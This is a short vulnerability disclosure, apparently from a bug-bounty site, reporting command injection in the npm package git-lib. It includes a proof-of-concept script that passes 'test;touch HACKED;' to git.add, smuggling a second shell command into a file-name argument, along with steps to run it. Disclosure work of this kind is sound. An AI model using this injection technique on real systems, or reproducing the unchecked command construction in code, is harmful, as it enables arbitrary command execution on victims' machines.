Command Injection in joeyism/node-git-lib
Valid
Reported on
Apr 3rd 2020
Overview
The issue occurs because a user input is formatted inside a command that will be executed without any check.
Proof of Concept (Credit: Mik317)
- Create the following PoC file:
// poc.js
var git = require("git-lib");
git
.add("test;touch HACKED;")
.then(function () {
/** successfully added **/
})
.catch(function (err) {
/** unsuccessful **/
});
- Check there aren't files called
HACKED - Execute the following commands in another terminal:
npm i git-lib # Install affected module
git init # Avoid problems with *git*
node poc.js # Run the PoC
- Recheck the files: now
HACKEDhas been created
to join this conversation